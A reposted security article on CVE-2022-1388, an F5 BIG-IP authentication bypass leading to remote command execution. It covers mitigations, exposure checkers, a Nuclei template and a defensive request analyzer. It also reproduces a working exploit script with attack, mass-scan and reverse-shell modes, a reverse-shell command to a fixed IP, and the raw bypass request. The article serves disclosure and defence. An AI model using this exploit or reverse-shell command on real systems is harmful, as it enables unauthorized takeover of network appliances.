Reposted from: https://www.ddosi.org/cve-2022-1388/
Typesetting: 释然IT杂谈
Mitigations (F5 K23605346):
- Block iControl REST access through self IP addresses (https://support.f5.com/csp/article/K23605346#proc1)
- Block iControl REST access through the management interface (https://support.f5.com/csp/article/K23605346#proc2)
- Modify the BIG-IP httpd configuration (https://support.f5.com/csp/article/K23605346#proc3)
Block iControl REST access through self IP addresses
Note: Performing this action prevents access to the Configuration utility and iControl REST through self IP addresses. These changes may also affect other services, including breaking high availability (HA) configurations.
Related articles:
- K17333: Overview of port lockdown behavior (12.x – 16.x) (https://support.f5.com/csp/article/K17333)
- K13092: Overview of securing access to the BIG-IP system (https://support.f5.com/csp/article/K13092)
- K31003634: The Configuration utility of single-NIC BIG-IP Virtual Edition now defaults to TCP port 8443 (https://support.f5.com/csp/article/K31003634)
- K51358480: A single-NIC BIG-IP VE may erroneously revert to the default management httpd port after a configuration reload
- K13383: Configuring CIDR network addresses for the BIG-IP packet filter (https://support.f5.com/csp/article/K13383)
Block iControl REST access through the management interface
Related articles:
- K13092: Overview of securing access to the BIG-IP system (https://support.f5.com/csp/article/K13092)
- K46122561: Restricting access to the management interface using network firewall rules (https://support.f5.com/csp/article/K46122561)
- K69354049: Restricting access to the BIG-IP management interface for the Configuration utility and iControl REST services using iptables (https://support.f5.com/csp/article/K69354049)
Note: Restricting access to the management interface by IP address in httpd is not a viable mitigation for this issue.
Modify the BIG-IP httpd configuration
- BIG-IP 14.1.0 and later (https://support.f5.com/csp/article/K23605346#proc3a)
- BIG-IP 14.0.0 and earlier (https://support.f5.com/csp/article/K23605346#proc3b)
BIG-IP 14.1.0 and later
Log in to tmsh on the BIG-IP system by entering the following command:
tmsh
Open the httpd properties for editing:
edit /sys httpd all-properties
In the editor, set the include property to the following block. It rewrites the Connection request header to either close or keep-alive, so any other token a client lists in that header (such as X-F5-Auth-Token in the exploit request shown later on this page) is discarded before the request is proxied:
"<If "%{HTTP:connection} =~ /close/i ">
    RequestHeader set connection close
</If>
<ElseIf "%{HTTP:connection} =~ /keep-alive/i ">
    RequestHeader set connection keep-alive
</ElseIf>
<Else>
    RequestHeader set connection close
</Else>"
Save and exit the editor:
:wq
At the Save changes? (y/n/e) prompt, enter y to save the changes.
Save the BIG-IP configuration by entering the following command:
save /sys config
BIG-IP 14.0.0 and earlier
Impact of procedure: Performing the following procedure should not have a negative impact on your system.
Log in to tmsh on the BIG-IP system by entering the following command:
tmsh
Open the httpd properties for editing:
edit /sys httpd all-properties
In the editor, set the include property to the following line, which forces the Connection header to close on every request:
"RequestHeader set connection close"
Save and exit the editor:
:wq
At the Save changes? (y/n/e) prompt, enter y to save the changes.
Save the BIG-IP configuration by entering the following command:
save /sys config
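The following is an added example; it is not F5's code and not from the original article. It models what the httpd mitigation above does to the Connection request header before a request reaches iControl REST, so the effect can be checked offline. The front-end httpd strips every header named in the Connection header as hop-by-hop before proxying, which is what a Connection value such as "keep-alive, x-F5-Auth-Token" triggers. After the rewrite only close or keep-alive survives, so a client can no longer use Connection to have X-F5-Auth-Token removed. The three branches mirror the <If>/<ElseIf>/<Else> block for 14.1.0 and later; the legacy flag mirrors the unconditional "RequestHeader set connection close" used on 14.0.0 and earlier. The header dicts and host name are constructed samples.

```python
"""Offline model of the K23605346 httpd mitigation (added example, not F5 code)."""
import re


def normalize_connection(value, legacy=False):
    """Return the Connection value the back end sees after the mitigation.

    value:  the client's Connection header, or None when it is absent.
    legacy: True models 14.0.0 and earlier, where every request gets "close".
    The matches are case-insensitive substring tests, like =~ /close/i.
    """
    if legacy or value is None:
        return "close"              # pre-14.1 rule, or <Else> when no header
    if re.search(r"close", value, re.IGNORECASE):
        return "close"              # <If "%{HTTP:connection} =~ /close/i">
    if re.search(r"keep-alive", value, re.IGNORECASE):
        return "keep-alive"         # <ElseIf "%{HTTP:connection} =~ /keep-alive/i">
    return "close"                  # <Else>


def apply_mitigation(headers, legacy=False):
    """Rewrite the Connection header of a request given as a name -> value dict.

    Header names are matched case-insensitively; every other header is left
    untouched, which is why the mitigation is harmless for ordinary API clients.
    """
    rewritten = {}
    connection = None
    for name, value in headers.items():
        if name.lower() == "connection":
            connection = value
        else:
            rewritten[name] = value
    rewritten["Connection"] = normalize_connection(connection, legacy)
    return rewritten


def hop_by_hop_tokens(headers):
    """Tokens a proxy treats as hop-by-hop, taken from the Connection header."""
    for name, value in headers.items():
        if name.lower() == "connection":
            return {t.strip().lower() for t in value.split(",") if t.strip()}
    return set()


# Constructed sample: the header shape of the exploit request shown on this page.
EXPLOIT_STYLE = {
    "Host": "bigip.example.internal",          # placeholder host
    "Connection": "keep-alive, x-F5-Auth-Token",
    "X-F5-Auth-Token": "a",
    "Content-Type": "application/json",
}


def demo():
    """Return (hop-by-hop tokens before, hop-by-hop tokens after) the rewrite."""
    before = hop_by_hop_tokens(EXPLOIT_STYLE)
    after = hop_by_hop_tokens(apply_mitigation(EXPLOIT_STYLE))
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("hop-by-hop before mitigation:", sorted(before))
    print("hop-by-hop after  mitigation:", sorted(after))
```

Running it shows that X-F5-Auth-Token leaves the hop-by-hop set while the header itself is still forwarded untouched; the legacy flag shows that the pre-14.1 rule reaches the same result by forcing every connection to close.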
https://github.com/jheeree/CVE-2022-1388-checker/blob/main/CVE-2022-1388.sh
CVE-2022-1388.sh:
#!/bin/bash
#-*- ENCODING: UTF-8 -*-
# Simple CVE-2022-1388 checker
archivo="$1"
barra="-------------------------------------------------"
dt=$(date +"%Y_%m_%d_%H%M%S")
# ------- Colours -------
endColour="\033[0m\e[0m"
redColour="\e[0;31m\033[1m"
grayColour="\e[0;37m\033[1m"
greenColour="\e[0;32m\033[1m"
function helpPanel (){
    echo -e "\n\t[+] Uso: ./CVE-2022-1388.sh hosts.txt"
    exit 1
}
if [ -f "$dt/temp.tmp" ];then
    rm -f "$dt/temp.tmp"
fi
function checker (){
    # One report directory per run, named after the timestamp
    mkdir "$dt"
    for ip in $(sort -u "$archivo");do
        # The login endpoint answers with a body containing "resterrorresponse"
        # whenever iControl REST is reachable, so that string is the fingerprint
        if curl -sk --max-time 2 "https://$ip/mgmt/shared/authn/login" | grep -q "resterrorresponse"; then
            echo $barra
            echo -e "[x] Host: $ip F5 iControl Rest API exposed" >> "$dt/report.txt"
            echo -e "${redColour}"$(tail -n1 "$dt/report.txt")"${endColour}"
        else
            echo $barra
            echo -e "[✔] Host: $ip No Detectado" >> "$dt/report.txt"
            echo -e "${greenColour}"$(tail -n1 "$dt/report.txt")"${endColour}"
        fi
    done
    echo $barra; sleep 1
    # grep -F matches the literal marker; without it "[x]" is a bracket
    # expression that also matches any host name containing the letter x
    echo -e " ${greenColour}[✔]${endColour}${grayColour} Total equipos OK: ${endColour}${greenColour}"$(grep -F "[✔]" "$dt/report.txt" | wc -l)"${endColour}"
    echo $barra; sleep 1
    echo -e " ${redColour}[x]${endColour}${grayColour} Total equipos detectados: ${endColour}${redColour}"$(grep -F "[x]" "$dt/report.txt" | wc -l)"${endColour}"
    echo $barra; sleep 1
    rm -f "$dt/temp.tmp" >/dev/null 2>&1
    exit 0
}
if [ $# -eq 0 ]; then
    helpPanel
else
    checker
fi
Usage:
./CVE-2022-1388.sh hosts.txt
https://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed
This only verifies that the API is present by hitting the authentication endpoint.
CVE-2022-1388.yaml:
id: bigip-icontrol-rest

info:
  name: F5 BIG-IP iControl REST Panel
  author: MrCl0wnLab
  severity: info
  description: |
    Undisclosed requests may bypass iControl REST authentication.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1388
    - https://support.f5.com/csp/article/K23605346
    - https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  metadata:
    shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
  classification:
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  tags: cve,cve2022,bigip,f5icontrol

requests:
  - method: GET
    path:
      - "{{BaseURL}}/mgmt/shared/authn/login"
    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
    matchers:
      - type: word
        part: body
        words:
          - "resterrorresponse"
          - "message"
      - type: status
        status:
          - 401
This template is a simple check.
Request sent:
Path:
{{BaseURL}}/mgmt/shared/authn/login
Matchers:
Words:
"resterrorresponse"
"message"
Status code:
401
Manual PoC:
curl -sk --max-time 2 "https://{TARGET}/mgmt/shared/authn/login" | egrep "message|resterrorresponse" | jq
Returns:
{
"code": 401,
"message": "Authorization failed: no user authentication header or token detected. Uri:http://localhost:8100/mgmt/shared/authn/login Referrer:xxx.xxx.177.228 Sender:xxx.xxx.177.228",
"referer": "xxx.xxx.177.228",
"restOperationId": 1461894338,
"kind": ":resterrorresponse"
}
https://github.com/bytecaps/CVE-2022-1388-EXP/blob/main/check.py
CVE-2022-1388-check.py:
#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved
#
# @Time : 2022/5/7 23:40
# @Author : Caps
# @Email : [email protected]
# @File : check.py
# @Software: PyCharm
import requests
import argparse

requests.packages.urllib3.disable_warnings()


def usage():
    print('''
+-----------------------------------------------------------------+
漏洞名称: F5 BIG-IP iControl Rest API exposed Check
功能:单个检测,批量检测
单个检测:python exp.py -u url
批量检测:python exp.py -f url.txt
+-----------------------------------------------------------------+
''')


def check(url):
    # An unauthenticated GET to the login endpoint returns a body containing
    # "resterrorresponse" whenever iControl REST is reachable
    try:
        target_url = url + "/mgmt/shared/authn/login"
        res = requests.get(target_url, verify=False, timeout=3)
        if "resterrorresponse" in res.text:
            print(f"\033[0;31;22m[+] Host: {url} F5 iControl Rest API exposed \033[0m")
        else:
            print(f"\033[0;32;22m[-] Host: {url} F5 not vulnerability \033[0m")
    except Exception:
        print(f"\033[0;33;22m[x] Host: {url} Connection Fail \033[0m")


def run(filepath):
    # Batch mode: one URL per line, blank lines skipped
    with open(filepath, "r") as f:
        urls = [x.strip() for x in f.readlines()]
    for u in urls:
        if u:
            check(u)


def main():
    parse = argparse.ArgumentParser()
    parse.add_argument("-u", "--url", help="Please Poc.py -u host")
    parse.add_argument("-f", "--file", help="Please poc.py -f file")
    args = parse.parse_args()
    url = args.url
    filepath = args.file
    if url is not None and filepath is None:
        check(url)
    elif url is None and filepath is not None:
        run(filepath)
    else:
        usage()


if __name__ == '__main__':
    main()
Usage:
└─# python3 check.py
+-----------------------------------------------------------------+
漏洞名称: F5 BIG-IP iControl Rest API exposed Check
功能:单个检测,批量检测
单个检测:python exp.py -u url
批量检测:python exp.py -f url.txt
+-----------------------------------------------------------------+
CVE-2022-1388 Exp
CVE-2022-1388-exp.py
CVE-2022-1388 F5 BIG-IP RCE batch detection
#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved
#
# @Time : 2022/5/9 16:52
# @Author : Caps
# @Email : [email protected]
# @File : CVE-2022-1388.py
# @Software: PyCharm
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
t = int(time.time())


def title():
    print('''
 _____ _ _ _____ _____ _____ _____ _____ __ _____ _____ _____
/ __ | | | || ___| / __ | _ |/ __ / __ / | |____ || _ || _ |
| / /| | | || |__ ______`' / /'| |/' |`' / /'`' / /'______`| | / / V / V /
| | | | | || __||______| / / | /| | / / / / |______|| | / _ / _
| __/\ _/ /| |___ ./ /___ |_/ /./ /___./ /___ _| |_.___/ /| |_| || |_| |
____/ ___/ ____/ _____/ ___/ _____/_____/ ___/____/ _____/_____/
Author:Caps@BUGFOR
Github:https://github.com/bytecaps
''')
    print('''
验证模式:python CVE_2022_1388.py -v true -u target_url
攻击模式:python CVE_2022_1388.py -a true -u target_url -c command
批量检测:python CVE_2022_1388.py -s true -f file
反弹模式:python CVE_2022_1388.py -r true -u target_url -c command
''')


def headers():
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'Connection': 'keep-alive, x-F5-Auth-Token',
        'X-F5-Auth-Token': 'a',
        'Authorization': 'Basic YWRtaW46'
    }
    return headers


def check(target_url):
    check_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c id"}
    try:
        response = requests.post(url=check_url, json=data, headers=headers(), verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            print("[+] 目标 {} 存在漏洞".format(target_url))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {0}'.format(target_url))


def attack(target_url, cmd):
    attack_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] 目标 {} 存在漏洞".format(target_url))
            print('[+] 响应为:{0}'.format(display))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {0}'.format(target_url))


def reverse_shell(target_url, command):
    reverse_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(command)}
    # command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1
    try:
        requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5)
    except Exception as e:
        print("[+] 请自行查看是否反弹shell回来")


def scan(file):
    for url_link in open(file, 'r', encoding='utf-8'):
        if url_link.strip() != '':
            url_path = format_url(url_link.strip())
            check(url_path)


def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
        url = url.strip()
        return url
    except Exception as e:
        print('URL 错误 {0}'.format(url))


def main():
    parser = argparse.ArgumentParser("F5 Big-IP RCE")
    parser.add_argument('-v', '--verify', type=bool, help=' 验证模式 ')
    parser.add_argument('-u', '--url', type=str, help=' 目标URL ')
    parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ')
    parser.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ')
    parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
    parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')
    parser.add_argument('-r', '--shell', type=bool, help=' 反弹shell模式 ')
    args = parser.parse_args()
    verify_model = args.verify
    url = args.url
    attack_model = args.attack
    command = args.command
    scan_model = args.scan
    file = args.file
    shell_model = args.shell
    if verify_model is True and url is not None:
        check(url)
    elif attack_model is True and url is not None and command is not None:
        attack(url, command)
    elif scan_model is True and file is not None:
        scan(file)
    elif shell_model is True and url is not None and command is not None:
        reverse_shell(url, command)
    else:
        sys.exit(0)


if __name__ == '__main__':
    title()
    main()
In short, the exploit request looks like this:
POST /mgmt/tm/util/bash HTTP/1.1
Host:
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46
Connection: keep-alive, x-F5-Auth-Token
Content-Length: 0
Cache-Control: max-age=0
{
"command":"run",
"utilCmdArgs":"-c id"
}
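The following is an added example written from the defender's side; it is not part of the original article or of the exploit project quoted above. It parses a raw HTTP request, as a reverse proxy, WAF or packet capture in front of the management interface would hand it over, and flags the indicators visible in the request above: a Connection header that lists X-F5-Auth-Token as a hop-by-hop token, a POST to the iControl REST bash endpoint /mgmt/tm/util/bash, and a JSON body that runs a command through utilCmdArgs. The sample requests, host name and token value are constructed.

```python
"""Indicator check for CVE-2022-1388-shaped requests (added example, not from the article)."""
import json

BASH_ENDPOINT = "/mgmt/tm/util/bash"


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).

    Header names are lower-cased so lookups are case-insensitive, which matters
    here: the exploit request sends "x-F5-Auth-Token" in mixed case.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def connection_tokens(headers):
    """Connection is a comma-separated token list; tokens compare case-insensitively."""
    return {t.strip().lower() for t in headers.get("connection", "").split(",") if t.strip()}


def analyze(raw):
    """Return the list of indicator names found in one request (empty if clean)."""
    method, path, headers, body = parse_request(raw)
    findings = []
    # Indicator 1: Connection names X-F5-Auth-Token, so the front-end httpd
    # would treat that header as hop-by-hop and drop it before proxying.
    if "x-f5-auth-token" in connection_tokens(headers):
        findings.append("connection-lists-x-f5-auth-token")
    # Indicator 2: the bash utility endpoint. Administrators use it too, so on
    # its own this is a review item rather than proof of an attack.
    if method.upper() == "POST" and path.split("?")[0].lower() == BASH_ENDPOINT:
        findings.append("icontrol-bash-endpoint")
        try:
            payload = json.loads(body) if body.strip() else {}
        except json.JSONDecodeError:
            payload = {}
        # Indicator 3: the {"command": "run", "utilCmdArgs": ...} body shape
        if payload.get("command") == "run" and "utilCmdArgs" in payload:
            findings.append("bash-run-with-utilCmdArgs")
    return findings


def severity(findings):
    """Combine indicators; the header trick on the bash endpoint is the exploit shape itself."""
    if "connection-lists-x-f5-auth-token" in findings and "icontrol-bash-endpoint" in findings:
        return "critical"
    if "connection-lists-x-f5-auth-token" in findings:
        return "high"
    if findings:
        return "medium"
    return "none"


def _req(lines, body=""):
    """Assemble a raw request from header lines and an optional body (test helper)."""
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Constructed samples: the exploit shape from this page, an ordinary login
# probe, and a legitimate authenticated call to the same endpoint.
SAMPLES = {
    "exploit": _req(
        ["POST /mgmt/tm/util/bash HTTP/1.1", "Host: bigip.example.internal",
         "X-F5-Auth-Token: a", "Authorization: Basic YWRtaW46",
         "Connection: keep-alive, x-F5-Auth-Token", "Content-Type: application/json"],
        json.dumps({"command": "run", "utilCmdArgs": "-c id"})),
    "login-probe": _req(
        ["GET /mgmt/shared/authn/login HTTP/1.1", "Host: bigip.example.internal",
         "Connection: keep-alive"]),
    "admin-call": _req(
        ["POST /mgmt/tm/util/bash HTTP/1.1", "Host: bigip.example.internal",
         "X-F5-Auth-Token: TOKEN-PLACEHOLDER", "Connection: keep-alive",
         "Content-Type: application/json"],
        json.dumps({"command": "run", "utilCmdArgs": "-c 'tmsh show sys version'"})),
}


def triage(samples=SAMPLES):
    """Map each sample name to its severity."""
    return {name: severity(analyze(raw)) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:12s} {severity(analyze(raw)):8s} {analyze(raw)}")
```

The Connection indicator is the one worth alerting on by itself: no legitimate client has a reason to list X-F5-Auth-Token as a hop-by-hop token, whereas the bash endpoint and the utilCmdArgs body shape are also produced by normal administrative use and only become conclusive in combination.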
Originally published on the WeChat official account 释然IT杂谈: CVE-2022-1388 exp, F5 BIG-IP unauthenticated RCE vulnerability